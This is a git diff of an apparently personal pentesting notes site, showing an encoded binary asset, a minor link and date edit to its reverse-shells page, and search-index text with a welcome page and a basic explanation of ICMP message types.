z7bL$!<{-NkjCyicZ3)GSrteO~1hlPDJ~t=d75s+$Y zPoFZScTGDdU|e_ixH_v~yjJ4XU2e@QyD?kkV#T2>R`tq&fYA3{=oUazP}zPA#~agB zR!y8UYnCu)=gHX<91~z>ul>(EgtsGs*t}tb^7Jda2m1G8!=v5CngODq)qKUYcv!w? 
z>A}H|PYaG>OJ0N%HejCzSyCynP%4@93kIejnc9~TUK`%HP(`SztLK#0;sM3jrFS}y zN_rK2?%PN8*~5Ms*gJ()Z!P}qJ2uLxE?<%kvHMOOIwU@Cj{P5EjgR*Z7cFo59)bf^ zsM$kinL57BQ^(_0tMuEF)&riIY8(NFgL$UZCDYOGUtR&^PL#0SaS35RtNy6R03d7} zM;skb5Z}IZMTk>Q!U|kAh~%Nve@MKQvDOt#N@!vsc&zOXhUvB@!7zLEvbM^Tb4DfR zcf0IN$vafrsY-8K&db8o!iQ+#0f-2;;`6;2lF_ZWw*wvX%Gl@d@afIys-Y3ukQ-L< z{35vJGPXT-VDO`48CUXit%n>Luh%&bE$x-T18cXDi9Ezxo2xgOb4RnZ9$hSr=o}}* zgXzh1+e3FUo(!_lHd}wZN^ko8E!>KpP{Oe0zJL41!`LKd*eR_e!{}l7N;Kg2JXHERHK5U(q@=jI?tAbJt;O_=o#+A8rRS0^c$K7G0@g43>`dKEb+ zgT`NjIdIen4$xNu2g7HeAQeSp-vtvvRlI7_q+MZQH^`Err+2Big2ac6PSF#q+UWT=!NoUy<=Ju=rThrKWxc8JVkYg4UMDefMw1y0H9H--^52 zaoYnQL;g>ZpqSK&J-@D9XX(laKvl*_h^1YosCZlr`Hc`wSzrN;1yV4#l=`I7r3{vC zUk~hGNEioG8dFO#(pV%Q2grGGoAZ66{JhwWQ%pr!86(unhYC`Am?;pw9#fOhp3q&{ zi%q*}lj^2@Pf^Hzc-1tBvX!HOtd@H`JpF|;aG9=b;IIy+SieK9agr##(xlOLFCgy0 zgC?H25pQxB`?S#4cW*?5GZ8L0V53NWO(|n>0CYG%B0mk%+$!FmoSg639~zN&o_l0t zRw+wo6vGuclTwRx=hhkE_D1mi0jfx{#bAZqYAB>IL4HGyf^w7gnrB}J8_9*dVU$*< zW95_LP!sX;7+1A(@+&ndI?Z#Dl#+$&sjge>f0r^7yHR9KIauo1{%5$8NXhpMeMo)w z7AOhL2{jd=b?)<{IZIJ#`h`()cJl}68aRD#CJtcUi4TM{o5rx9iZ^`rAetJW2BY1j1*3 zSA0duGlSjTi`^b+I0@AL$dP$J$74=iNE%DKPerTF#T`DZdsAAf1Y{B&E!a6DW@HV~ z%Y^+1vEFTShsU_~Os3(4suiaMxXQ&p>K4eaIR!d@UEjY;znM1R0`yPg5JIOXYk_SH zqR@+x2>5$iD{eCRSXn8o6qX;I4wx|sx=9e)Q>me}2T=G3!xFG|W!Oiv9CbhTT-c;y zG`VZ~Du8Ncm163ljjEmzuj{k$V!)A*NwP{G-s>-;>C+s}5d#V&3-|hBUP3KF7nF>Yl_@u{eKK=iuNbu;rh~0yr8!zYL-*U`td)^>xq; z0OJHCB5W$2_CTP-0r%0dW?lnp+t!VGia*uECcsDX*PE(Zyp8-?V8D zhTH;m~3%*qMTg({ZUR%%;LU5^^TO8=?$~Iye0-m?$?=!V3E{@T8*j!8B^CO6WTGP0GuRfdUBK4enuy&@q~1s?f$ipLV4cqlK@SyW)j(=O5*dme126KJoXFp>@AVbx3T)hZ^YK~P@~+|Zmw{6zQa*eo5e2zH5KcoAT{S#RAa<0;qVSh37R?>nwuNM& z89j_9adX4;o;wzT{`W*tF z{f-)yIFg5q+*d2(5YcOUo)-dMm>9R=!)HA@IfJN8m5w0_335|$aMN>0zq{|9ju7Hl zgb1|GV{t!b%qH47wI0y#TXFE==T=B>R)F}j9yKp(A-WX&kS>azb7)tWZ6*(LNrZD7hL=)-g`rD85uRLT4#4g8SNcG z7`cGz?wI%Gg8dIHshPR?#xa*Ak14UheMx^w_*%V-Zz^#sHxTq^R$)yyAdx~hatFi1 z!>c|YqG^|MIJJA&Nk}Z9*z4KZG?Z55?9TgH&fsqyb#;UO+wI80f`TkIX3ulXPtYL( z+!W5WBS&OHUZEfX_7IPAE+eco)qR)(rLQxf^*Sd-;qzMA+59e-IuD@`0gz>ghSPE6 zNO}UH&EuIk#X05s;?hWi8*GeaixyGEq?|c}jpIDObpiFq*gPbcAl@kQ#ydHMi!)#Q z^M4avT>&7kd8K4)c`W8?jajLtrpvhnsd}_I_H}-AZAINySP{^mJV1wl<9BrwEqZZ1 za!MLX3UYEy7()mW)ot6dO8rRcgxx^n9@nQmYy~ZG8_kD|6b8&gzyS3Fk9O|78@z?# zI2@u3Y|rRYZh3{R0@OljPeU9nZy#zOk4G(@~ zsPXGMg#9WPXh7=3z2ybSMEZWWprGRE*-t<-LNB1!6H8%mS8&shV%TiR93K+~H!UGV zG%Xo)Jx-V;G=ofwWre(|bY<_>?8_R{f%6ebl{5yW>_ATPSrj6VX z3gurfdkf+8Xn9%HoVupPDgg$mA%C@;0?nNH-~oh8;QEMP|He)8L1-)Q58Q-FhH7#7 zxF|a`S&Q1WOHE1n;rq{Ql+)3~q7#KNoq` zNpZ4q$b&6erO0@S9s;&BHU1`41k@&s$Pp$DK7Re~9TMAfAo@fMdPw7j{&o749Yh6X z&Y5}lk1W(QY`L_CV|+#L4wvx_J9G z$l;fUuHfdXZ|c+JBJ3eyF_ve){wPyJvdg>iqOBRwWeD)Lj*gS)F>8%>=~njeT^5wU2l2(SvjM)%*9{p(geR zIt3$(7Impy#8B?()h0Mch|#|wx=|!SJ*C>m_?TRTX-&D`$mvIlPd>j7@{onf(ZBGd z8?m3q#HUg0a6TZy;8l4-i27_lm`&h83KUjqA7#sydu1=rk}0v|7SNQcgoer#jQ$i9 za`N1h0PCdV(3O5mmNfXh=2*qtf_HlG@ZnihRcNX+=7H0;lOGPybi)(0*T&XXLEo_G z;lrfev0aQVEJpvRCPN|H7AnQVeIkJNxjJ!8QF0mREl z^uoJpwGgX751V@W{Q6WM;f@BQnB}F(X7zLtaZ(f;&6sJZ*ovvVwbETi)GjP4i+67&@KZFOp!f zHhA!4Pow9yn4p>_Ay@n$|8Q|sWF+vOlFyakrs)BnU_MgM%^0xfA1y#ynt}vGpH|ru z{U^H$R0>g?iZ=PL?z3jS zr11s#Qa~s9Qv`=*_m^T|!JANRvM4#7XeX8L3RqVp0C&eGGfRLLD}gS-H6X}ge9I>l zjOx}_zTnAVq2eI9Di;!`DPYbmum6|vP=W~M*K2FX$^V#o$wdVI6TyTqJN%!!EGMU@^MCqB zg!lN!7b=sC;en}Pn7O$A z423=5{rE|f%rJmNTjoZW@p-fY@JslfkbfFYIdhCHNOD)!zUBFsyb~U!OzcAC!;*we zBzwafLrQTXOfcXqAaR1(%GT-@XaIl@&y_e!5A7m017E%t2Y3Iq5|rimD&5#+Q_lFD zN==2c97A;u?1yD7B^TkH)C=T5SuAGuVYfx=6^c1Zb(n(&Bs$s@paQK_!0?up?5)(i zEeWn{sm7P#matQOrk&2j?4E!hepa&oao7&fvBIm^m+(JeG 
z;XaiW|ISlD<;H1|t(DtxA5tVZG>#&b<=vW}fn1+Wy?F9gx9O2TB}|i3-DS)JhKA(- z697+Aj^mEj_|CoQEoBpp*hE{-<2X*J8JRLpFtyDWdXOqJnbGdq*w8i`v#IjLeNUY{ zDX4|`+Cu0p2TR7QM0MPfU!SS4DnrigB7hVOXz&?FZUL=X1lE!Z>E!0$L@|X}K0HB^fut zhlOW%{ZE0Vg*0O^($~ZW#3rAiL-=zE>vhE!H+pe+A-F*N%#G*H=9Sk{Py_gl!!NzO zwnd2>g}Y37EfBRpeTv0bg=w>l%le8ogEdQZkGEb!?EMN_zy&w`NN?(DzRU+Vcdq#C zSsi}QEaJF)fm{F_fULAm4q^CH$vg})kD`8MBSQs&$bnYPzw@PK+lJ_9QURnc13rR7 zoqwUj&RYUk%F-&j56K4h)(zL(No!GV0e9bFG(`4HY#>%*LBpz3f3Jn?gu6>2z-fV6 zq4|_VZ^*jfdmdPdwha36?82s+*P}5;ap}9K%PeD!)eixj z1IE=a9dO@LcEghmUwx;ki$!3-fUX1k^$Xjyi4j>x>9fV<564chYs<|-4aY0UsyRNf zW2ofO$qNAd`Yi0;27`t8`BhPKUq|4A^cv{{L{iz}O162&W^v2) zT>E`KWhGv>H}dlZQU2%8nA{+k@H#b#AOX=0qL4VNV@wv+5*Z4o5Xdy;C8|b;Wy=Hz zgw`}P_Ku?Jni{4DP;=2jI&$8;w{#bx19@_~yg#TTR|kAKmn721#9UAB6}b|TYunD9 z3*U>uI0=T}r3|-1j!2Sod(U8Kt$xj21pBjVmlTh~gMj=wM&o14Z9KjiRtk(5b= zl>Q)jb~Eq0^CH9$DYSrYM-L*;dDqrXUr`Vp#|~M_w2W&Y_1rP2RwzR{7WOj?T7)Ve zSE1MF`l(H^Pz6mVm38|#UL>)ZKHUPDD%VNDP5Xal=1f#24vANpo!YlA#Z+BY)vuXa zEC3wlDTUcgf_WmGUYd`rxQJ_JPc@%`qUQVEfKAPxtSh%UYMV03YqPcfkP96L3<#Y_ zTPtuEXXm-Bzj3^dqUY9q(TJA4Z@FXQ4~O5HBR|*}H*dtVu`SO}E^x{&EuCM#|Nkdh z@;*R_T~>1Sx6-WyS&(`Tp;sw6(4q?-o%|a)PD(|~^|@&XsoZhFcnwUjbqtT3sb_QV z{7sq(Dd*9@+6kP8S5OzjMS_>^%pxE=mL$hPVIBtt2I!2F=kUg0(h++JxN)(|)Tx2! zhLIQN-n@A?8liAIMMXDYR}^@V78H$8-R@(@0&z!Uk4YnGil;T1n1AjafAAhx=AVRF$yZ2MX$jpCoW3%7F9VOy-71Vp6!9|?#EcYcJpMB$K zCD>C+_cJy=$9O`?E6_(Sf>2&pTRVUdxn+yKAZ@|34{54D=@!{Y9(L-+8nOs*H|+G- z;Vao;#A|As#;+Gz=4`ek<=&TBPuxc!85_}G^;P>g0q_}kexLSAz!)@oQhO|L7`HNO zGu`XW$2s|zVCFJmLghQ2ld_Z_XP2^+6(p$FDL7?9aU)Dhuc#19sr{^rKf_ybF2ML9 z;~PC%fNgvCe)n{5OOczZF91dbN6;Vk2!*?Jd1{|JSiXZ`bK&w7TLz<^Nh$O4efBS3bUOylg zULnacLB4R*i&=iOIAOu(mBM*L<}ANv2CZS+w=-*Mp096XcJ1OG`ub|Bs$+H;|DETR zjtUADt4xSY%saA~g8 zj1eQa%NBh)ZIz45PkJX+mNIwBk~Ez9RxMb)`6my3dY9g-A+Z2RL9Pq-DlsH_e23%N zQ%=yPio$N$G84%w%&%HZCi*n~n%RyTNa6&)uv|L0O|mD)N8N(TMHA;sJ=GZr@=L_9fFDrT0UCNtzC1nz#%Af zk+@8nKE1CCc5NH~!TuU985?O>%}2rHUf7OSO^#Iu)9qWg&YV4a(5&n2B5QDQVc{fC#sk(b(T2o1vK@g{MM9W$uKz1ls!*Pl0{H{;Aafv(On{$K|2!}0#Bj1EV`kDjxvhjYg#P}rNN44%pYZItqt(7 z(UTkKy7)Wn6jkyquM{9`6C~tP`|;!NvG`hDJ}Z*2a)dz?J9iq$Hfi)L;|UQ$2Rb|; zl>};3mI6$o6vY18L6BLT_bXk^dLrmzt3@p!I0%Yv&}G%LCqr&`0+(S1$1QF(U?)ck zc{Nycl=$xPDW(kXq;kI-;MR#r9!!$5wrh#wR$%J*lnG^`umrWX-AJ5vDw=zVozmUg z^61RHAM~Pifr^7KotYAj-T0h!$3jL{m91HAr8N~(riskMtwBd+yk z4!q+a{gm^w4sj)D6r!*w?$qh^`}b_@o{uJgReKle;w?mN%qdOIx^l$|#k&3)o4y~P zc6r58xP`7JK7RiGfE|#Q>@Ncub`hn+Ta^}W1#@kuVI05vx0doD{-eK+dP_(_I3=R~1EyOS&MLp;U>V=t5 z0kpVLfZZ*PKv@FjPT6|XQ6a2 z+wu#)4>A+Zddq%Hu!k<>uJEGwh}4S55Nh7Dql=k<#vnU{f*j`|umlXg2+#RZU!8#d(sW~&=C_J}E!;P&`TJlY zK7I@$^S&VP6UYFV{b^ueO8+p*1=`l|6NNAHFsAt*`Wbd^xKzruk~1;-gd~6o%jPup zSi7J6zL~C7G>gHYLVPOe9Z4QKV_1btFn#3FeTgeaphyBbLSeG{Sm)+94bc$pUWklyHHO12PAGfd7bS)7+^H^kMcxIq zv3dw483HoYOkV}dbtY;6+-qsY3i&!}tgszjePmbE#$3(!Fy>Ia71x4@UbPffYKUyg zrGS31TJF0b_-T0ZsAa3O_j<@Mgyco1CoRX=?SH|3)o1_f>s?xo(E8tIa1vR~_eAx_ zw?#fIwI}M6ebF^2%+RD8Fy+JvNA%eh6QqXAn{UDmo!AiuEY=^2W}+7V!t@Kr6Z;I5CD{+Xotny!Y= z27iE>7<$r9&q^2@UkY@C^RH+ur%~U&YVWaVWwxzEM%K`(b!&-IU6F!F^qWS0J z`yH=~`MnuVYbT#T1OF8@$G?@N-in)=$9~eGxZG0)3bB}ziPqVc3%05uRj`_mpY2Hy zY{X|KW9RUtK=|_J3U-VXsLU)uo{0@GImk;kIc<^A7H=^>Cf`1|tvczzfquIMU`IuY zD~2me-z)AHE@YL!vx`p?W?wE@lIk%Ia^TJuhAH;!i8WyvK@?}QXkS{Zd`O;rOxR@4 z(RwK=C}0l1+cMZf%lEN{MI3_Rx`u|p3xClY$SGR%5OEHgt)@(smUB%`y!wg&cL}wu zDF>7ViM*8Ij~Q^|b4vw1-JZb%I8_c_+$30dv2bBEskaSeJ$v_Vg6TrEoX_p@SFspj!ZIC;efmQPUAt1cm_TD$+bI8&;)a&~6?biG# z-SYNyuIt4!Z8Dh+OdN{t>lHOsw7`eXtok>-M#xfcNa$is0uXFJd6*I zPOZ7&xp(m5b>h<$&D5l5WjUmHs_#IAGW)Q_xO~B&n`S;DHa>QYewIbBmqJ41=)ZwK zU}hCP)7vKM%M9JGJfn-8j%)5O_iqy8<<2gXO$3>fU|$2qQcS$u!KHMpLZrUSRTQ 
z+eT!rJKLsf_xH5N&tLGQ8Y6V4v2*5Ggo8?M%F>4 z%0wM%+~zP$_K!wF_mR*yR1(h;Q(Iqzi)!gapujl;?m;s3=GCjf z*H2p>{?+`p&5$<_mpIOu%4i4VvjyBr*3IG(%0BWi;=YB2P`iTPbTh?OPj-4nn z3jUFsH(WXv(%RZrD7a>1ts9i2MfWVjbLl4&atP=viWmTXj6hzZZWKvCNPt2um%fdn zQ-eQ*3Jhxcxm+3w6iTJYvYG4RBjn6|r!f}SF!tL~IzzpXrjWhTxLO3vOlTS@n$dqZ z4Q+_P8kpomk0P94C-D7J2GxXs2m6oeEFQKY5rXB31YMV;`##u%)FUqbR zKEq?brkq#}ACu0VM~XVLQ6nV7uW8*WU!?T=NdSp%awBc5$D3)I#5l}pwQ=J{SdeKm zXYN0@=KI)ItypvIjs#a+&1Ahi~NN4a0bZ(t^*tK`6s# zov}4GC-3Puf2)Q>08A?FdSVn8!OG)RsEXP<4Eo|+f{G=mI0%(L3oN*yItNcgjBlo+ zAxD}3P#S7}DDJl407C!c;c*6w+O(t(?wIkL_v=TFR?TUKt%WRtWe0Kw$&5+|C0Dh; z%Ln;FvS=84gq%yLpKOcg6Z2ID``bMGyZPFzZh7O9Mt`e8ay83=Me0X_oeYsE)SBT{Y5mMV^E#+ZdamXq6h5Q%YFhtlEUNya@DrEM*Ud8{rg$#}EDB{#7#5OHzFweRzmnF)w)f{Ve$$Fi}iRcXhGX@x) zzqj?m;khxhw@yAB^Zed}(Fb>Q_IlG}+Mu=z!{q0!o*7*>?RNk1daVZ<9cq^u^2Z;G zgM#-ID<7SfTac0U?pw~#JKyen4a}d@;m4s7pMD0Vw~>o->M?R_!hAWoXT6dy*F`6c z7QU(TMHt3gg+0vVd;Kb@qQX1<%IusiTz;uBdg}bw-wL)n!t3S;#b3IO*WG`~-a=|3 zc_hNi>YIH=^Kazh1G|h+m%Ew)z;Wd905h|57~d{WZTYN^Vi)816Oe^ zpr_@dO0;bi;qk#j?lRV%e z(*>htF@ZC<>E~DUxwFnbjTtn*F0-vsD(Xy;Ab&+Fl=65FsPWXP4YezL>!*D3iHg0~3e5G{{b?7X^u_Qi^$ zCr|pJ#if8+`HHz9;o7UJ%WNewyM)K*7R`e2MKg|ZQZ5>B9v;RYj6=9FFHI0FiiFwi zd?lPie4d`^!$2+%<4d3Kj$U?gny8x5%Lob&Vt!#@z&KEWtlXLy{aqs5@Q{@qSSS)1 z@R=(;?}3+CR}+p-{P5zkIcX(yg8ZlcXdp0#>e6mqI;N*UGQ0rkkb5Rys@VYVKJn;g z%xx7FpD?-XnEIE97A z3@Hu!7a5939KCSCqN$;lQ?2Rw@x10Wp?H0Ry_{4ONnQKpGmj%eZ{*fQa%$MI2Sr6G zb{`S2bkpHy+e(g2JgVt6tnSgQ2^S}PEO0-cbmfvX`Kc?ixOlgxSMI9VK@uj!W^txhN}uVM%rKquJ=>;Lt4$1x%gSO)YOz4| zw^f3UknC~xl8yur3NRlW2-AzS9^J zve^0g{9#`;livswi1X+OzW8%fe9-bti^nIGgVY2WDDLV%`zB@W-W6{TLu-<@#T9*%Laxrognp`mo@}HFy4CwVe4T&DID1*?jzUV_fpWryjvLs99gh4s~mnn(Hh$!}jHb~-$?gMtFYNa^vNx8_S0Caq{q zZ!(>hH5Xg^cGA*%j%CVU(mgH1#v6pi`_J6f^?r}Be>mF~9Jv5B5W>7@PWSY^%EyYCHYjP=9sEbX%F$DveK>^5 zsuVK>0Dqfg=3R=J#L}N{)=|j<>)mheph;l+$gS3ji>Q7vPOq)2d(i9!j6&(bnx2}u zSscmhm1JT;pHB@e(Q*tsx^-6gomsv66mQFl1uZ8Sh8n(c=5Eqah?cVY#!}WB@Dg>XsK+&#%aXTAD*ye*dG_3!1~U zM;wpPFzBo((jJ?CJ-(!};_kXWY!M+qJ`BQ9{8S=|wM^>Qw{P2~E?_G2v0)NvN=YQ{ zsij&0^-%l-ee`ev5X<$}ob+oKRBc2o`OdlEpXuJU`?{=YXw74r zDEF5?mRnWD4wPD(YA!Zg7TM}pyt7-oO#j81uFnF;`%HCq=xpk>?>-ZW6JA-;B*!&c{HVY00P^RCR*!oYNs+co zbFm;?lpF1>ck0FNro1SPmq|zLx8Jh$+p?wZNO(_mqD64etxhr#p@;&?#DN z-m6T1+SZ(_7cC}rJo+L`bMzz~YulYh6E@!266_UyecZ{Z2^Qnp6unO*Y$x+LTpeg| z+p#um&Yq%ke=d7j(Y0;lK#*FAr2lF$gK^gj8 zLrU}3uj<*qN4c1nz6SC>yC`Jvze5b?&$<_2%niy^pQg zHY-|3$ELkLUSVmNzLjPBYde)Q&N6Axt((*PnHHpk-w%+~IYg#fHXmD*Dfz)}Y_HaiDSM#Oqul9xmizm5s}^=LbKRDP+J%)( zc9GddobmI~9hY+ASkWrG6E6>>9?9(4ndzO~_LrGg(jAv+YG#ComF4y%T%DQJaoqNN zA8{Sx`>}f#d1}vh_nGOKTb4YtS4Ko;TzF(hV7z}%Q|Id1oPIgaZuKgQ{KD@SixuGk zlAeaay1tF2kFMvuy5qXtv(+Gct%cQE)m7gNc=DI7h%Gri((-h-G*j8>oJNBQ+O?`} z^8HRCjsMl9X-9vBjq?+3K6_Wy))3RvnPb-YrpI}$hnvYOoB&R?SlsXd3! z8-JvbHm5xO!2K|zWtp}vNk8eSW_cWpJ-u?tfZ59OXua?QOXCmXXGS*`d)vA^i@!bb zSgn_zS@>6>dIQ?LJU1*7C#W!H)Q7zm2G@HoNNNAbW5atM?L!ClXZdSis7RycCdq8H zlz#hlCDJyV!fEH$Xvig_1AUbTavBthrJX_-5YAJWjY>C@kHnSV=mAwSY7=K-k! 
zG~rQ)FTYx$#4M$O1JS(=UoJ$g{#hX$X~Q9UifMR)7dFWJDN7rD5E>jT6W^cP`3g}S z#|H~4HhoQF{n+8LP@2e-K27@2@_6|2(Xz_HG-kA%f*#5 z$My^(4l8OMDAgX45HFd@C}N2NKf5-!D_z2jN;jxfzd9w#+s&lN&|6DNJt#BG3_E{~ z2*>7JbQXX_MKE_B95PT6)+b{H@^&mmGB#>+B>q+B4M+-mR$@DgK+}gWK_!$_(unv` zNQ;Gm_|S>@i^h;VyMu`6Pv#5nUAvZW#C?UX3OUZ#4*817mT$M~Xfdr9mp;4AFD^kJ z;-7(HzQo)_oUIF}l)^(NSa%uBi8~9 zVMI#ZLmnG{Zq)bu1C_Wt4plG!C_&n4_L?z}D)MF>&%fEv;~&w$152@)LLMOqHSsO3 zIb=W&7iulj@KE^&NO*TTy^mDXG*KYEGQjGgOlK<>lS%Rn9(`D1=O=WUBE5T4!hIwQ ze_ggVm-*vK52Epg=B8;xdym%BONVr$WE68GYcqf_~>L#7CN#@Cb>0C)) zDo;@DxiPRj>~RC!MKzMp*)&dP|kN^8Abf<;l*4AV@2Euyy(#YYd~LA z{M|%EvVGN%cQHEj4YxH^WpW}tVy!!F<>wotTtm|*X47hDJmDw@OS$r3ifs)tSB{4l z$#!D*Z#t8<)*%U5H%ej}kBo4T7U{b)KmVwe~)R&MWuq65wZQPn@ zi?(MKZ;SIVaLZ*h;nb;j8{5sMx0`c6N4{xBQ$sQc+!L&B5*EUObSXR($kLIF{_@MK zU?1F1+3@jn$zHlNbHNo#YziBs-`}QPWYyT5c3zZXJ3Y)4%07h$zMz>ihs$+Idr(!C zd*Z}GoyULfGvcSC>1k`qI^b_ClVlYYU7$`x9KFb7o(Tl>IowDuuk_*H@~J)}yhlND zjz|TmX*He%V!{GRO?)TBlp$(2X&tCmj-1|GJyr5DP| z47fCClp6A8fvv$uRgwF~Y<=_8kC9>m(uECz_Vs&yp%3`P7x?ip%=GM0o(x;tXe4d2 z$nNSKd;Q%{*6}>dHOx-%cL9MD6eX)R``o#j{j9=*m1+TWCLy_;JR1>)j+T}HbsSCf zn^i15*M-bla&~L##6a@|a}RYZkP|0skNzHWiJ2B-WmHSF+6);qsO|a10YLa_#qbZvGedl2US1u*}oY48Kx^Kv{ODA#`zqIWa0EG&E%% zV>-(dFWVB2dv7}!5yz-8t{x6;?`*awZVL|!Be>XUR@#p@?;xn}UK${QmEuM9L!BV( zPLLBx9H2qN9tnlCzp1GI-`yxJ^&yZD;=7RE0r0_sieAVk(Z0|0^_GP0+ST2Vl)^pH zP!rBDJoW5d^at&yH7p`xYyg_FW$d3wngqbf!b4}`sv7}4;4|xPT&N*flv*zS;T*)Bj009&;L0#BzfP@CA zsE8@BK7Oo$*8mENYPOr69;V+GO+F5-bWK5iHKuFY0RkfD0GmS*oOki!_K$~p_&(my zSlo=P7dl)T1TIQfBrCYA*^3jvwCmmFBdhhlXQU1$ZNwoSI&~AoH!s@TlOL!tmK$LU zbv6hOQ10&8BRbO#Vo%_fW>c$C$Ci|l+cjUYkgb9(iMSgtbK!aP8Ep+FjV}ZySXw5F z0Z9O!-CNYe!Y+t&ST9jnhzBxxcaYt?hO`n}-^U^P&pf85<-=Tc&np&nO?l(i$GL;{ zh5SPbui+4xrlNWiY+0><+1^&E67K9~ku@;mTL)&I=z9@mc*M>0i$)TD@s zJgY@6C;yPbvk@fr;vfHp`1?J*{bzDee}~m+Ho=#w-~VdSXrw9} zjt)JQkUy^A7iY{@1B1MjxwR`3@(PKby2;ou)9!t_i4UZ{+HM)8Zb*Babt}7LMElqI z9tT7P3y%@^ot&IrR0VokI1RQ~b1+*ey>Y|WL{f1MMZ>u@3n%)xjyG(nFca@g4rC|Z z*Hk=p_U6i^G2$JUzHfi{gTI5xp8U;+e3ktScq?|*1Qb?-lJw>|R`30bJ@3rW7AgA< zi(%<$)qCd?l@ET--4i363R>#7psDG?6CDSix3{`N-np}> zBqc_Y=bmBo^2Q{nh1Ie|*^?MQF`**NbnuWNke_q-NMgnrqB~nVjS_M9o+92FGI%hg zJOPW0DxIth3WnHnbtMB_QSzLkA2Hc-z>x8yXuDDT6oV91)h%H3Si~kMA0yDA_Ryfm+R2Fo`q?vgU6nuySr5(7&4d~y2mm4%aH6%M=*8#10%gQI zuZWbSHXOhdjMYU3UpRZD&!$ZUtIaLQV%8KND@6szIHS|(7jfWMGv))3Bz&K!o6voU z-riNIbU(Z$ST8&6T*$P=*HlQ#N=kjzbX9J`tBFBPufS{V{ZNVn92Mz zNixbVF)RnENEFTqrEW@62nP?!J*@bpK{%%2ozYhfntnlyVHDP<0ryj#%qReWc2V;p zs7EFjAn|)!R>j7E5_Qqkt+Y;%8IgG;FHTUI>>{qftPqut)W{VPz>2aIZ1h}g?2IIt z&bOz2r4p6~F#~nAZUi*L^=-zpW))1e!a#=nEkIJW<<)Z7&6=mn5$<_pa2iO|7z?jv z%qa#+sLu9j>=Is@v9S-w`E_0=ziqj@S0FG8*9(jw{ts9LQ-q{SMw6KfLZ7`7lGi@X zM({3Vef`uZ*4SPpd9;U7N^#)LD4(f6$qsY^zGRer&SoFlc&0@lhhktEy%lDl>H!jx z!M$dh%5zmd?%g?~QaX2pA6Ysd4+~wRx3o4>nr&-W`fYbQM6SmTC_nScMk<4@XIU*Z zV5o};=GbIDa7|eQUQLogaSwxs0a(HdCxI+H+%;MrH*WYR=J=gh6?$`(7@Px(Thjr1 z3pJYETA)eNMW#)<5k1in8Qyiu$;wTQ+GowEy_t#d;KT}iSMB`#{L})%!%JWRIQzEX z7L&H;&m~gxItPX?zygM4MO##KH<5~n`rNlAy95R>s{$LUhXpA$?jE*ZjKnYk<@?!f z(;Nxh^sk$qN#PQ63ihVvFX6_4Yfnov;{0p z&dbIU!RZ`)?YJ{CUmtI8;1@SKzZAdcLK3)Wt7$*7siq2%Wj(2BW22_YU1WBF63e8t zhPe1mn|Z9R8SF!$_f2KP+{26UNrP*#8qtGBswMlCE#(M3+;HnOO6jVEz~CP+s|a-R zo!yfmUqX{b6uFdX&=SGWQp)<`|WTxzn!5=Ei_i3n&U*;Vt z_-bZY;~%CTpN0wUPZ>9=Xy3p`oN`jx0o@q?>!vDe1iJ=9sGep`JdS0 z{J$>1q!q~PeFAoVd7i+e#Opm#DZdZ-s(DqP@YZjeVr%1vs@=!G*|oMs{tVs}OX*Uz z>h4!>Ch$l8D)|V(W34To{P4nOoLoy1FMcW38qOK&reP;3LYP^Stf8i6Lz&+u@mm=J zmi=-+W_Qf_DQj+ZUy||6Xr^!Sni6MS$dQbmj6VF;x_)8#-JdJOE_^qz+xAN49NvoU z{ku@?zI@~6&3~AH@i)BwiKOd))~9ij^4Gt_oc?#9?mv_D%8%r~s^|Xy=>9{O*wUl$ Yo$dXh-Z!fRHm+bYbAj=3sr?Us1$1+wGynhq literal 0 HcmV?d00001 diff 
diff --git a/reverse-shells/index.html b/reverse-shells/index.html
index bf5cdb9faf..4fb05fd6f8 100644
--- a/reverse-shells/index.html
+++ b/reverse-shells/index.html
@@ -15825,10 +15825,6 @@

    Reverse shells

-Other resources
-

    See web shells

    -
    -
All about shells

@@ -15942,7 +15938,7 @@

    xterm

    - Last update: 2024-05-31
    + Last update: 2024-06-08
Created: January 6, 2023 21:39:12

diff --git a/search/search_index.json b/search/search_index.json
index f31b8a9728..53be17630a 100644
--- a/search/search_index.json
+++ b/search/search_index.json
@@ -1 +1 @@
-{"config":{"lang":["en"],"separator":"[\\s\\-]+","pipeline":["stopWordFilter"]},"docs":[{"location":"","title":"Welcome to Hacking Life!","text":"

HackingLife was born from the urge to document the knowledge acquired in the cybersecurity field and the need to be able to retrieve it.

But there is something else: I strongly believe there is not much difference between fixing a broken faucet (or opening a lock, or studying the engine of your car, or walking in the countryside, or\u2026) and assessing an environment and describing its vulnerabilities. As a matter of fact, I spend my time doing all these things: fixing, repairing, and creating narratives (yes, writing too) in which, magically, all parts work together harmoniously (or provoke the end of the world harmoniously too). Tadam!

    ","tags":["pentesting","cybersecurity"]},{"location":"#second-brain","title":"Second brain","text":"

It's quite intriguing how brains work: no matter how much information and how many resources you have available on the Internet, this is still something you need to do for and by yourself if you want to understand in a deep sense what you are doing, keep track of it, and so on.

So, to be more than clear again: the main reason for this repository to exist is purely selfish. It's me being able to retrieve my notes and build a second brain upon them. Therefore, there is no intention of being exhaustive or giving thoughtful explanations about how things work on a deep level.

    ","tags":["pentesting","cybersecurity"]},{"location":"#acknowledgments","title":"Acknowledgments","text":"

    Nevertheless (and to be fair) this idea is deeply inspired by Lyz-code and their Blue book. Thanks to this inspiring, polished, and... overwhelming repository I've found a way to start making sense of all my notes. Kudos!

    Finally, I would like to highlight that this content may not be entirely original, as I've included some paragraphs directly from different sources. Most of the time, I've included a section at the top of the page to quote sources.

    ","tags":["pentesting","cybersecurity"]},{"location":"0-255-ICMP-internet-control-message-protocol/","title":"0-255 icmp","text":"

Internet Control Message Protocol (ICMP) is a protocol used by devices to communicate with each other on the Internet for various purposes, including error reporting and status information. It sends requests and messages between devices:

    ICMP Requests: A request is a message sent by one device to another to request information or perform a specific action.

    • Echo Request: This message tests whether a device is reachable on the network. When a device sends an echo request, it expects to receive an echo reply message. For example, the tools tracert (Windows) or traceroute (Linux) always send ICMP echo requests.
    • Timestamp Request: This message determines the time on a remote device.
    • Address Mask Request: This message is used to request the subnet mask of a device.

    ICMP Messages: A message in ICMP can be either a request or a reply. In addition to ping requests and responses, ICMP supports other types of messages, such as error messages, destination unreachable, and time exceeded messages.

    • Echo reply: This message is sent in response to an echo request message.
    • Destination unreachable: This message is sent when a device cannot deliver a packet to its destination.
    • Redirect: A router sends this message to inform a device that it should send its packets to a different router.
• Time exceeded: This message is sent when a packet has taken too long to reach its destination.
    • Parameter problem: This message is sent when there is a problem with a packet's header.
    • Source quench: This message is sent when a device receives packets too quickly and cannot keep up. It is used to slow down the flow of packets.
    "},{"location":"1090-java-rmi/","title":"1090 Pentesting Java RMI","text":"

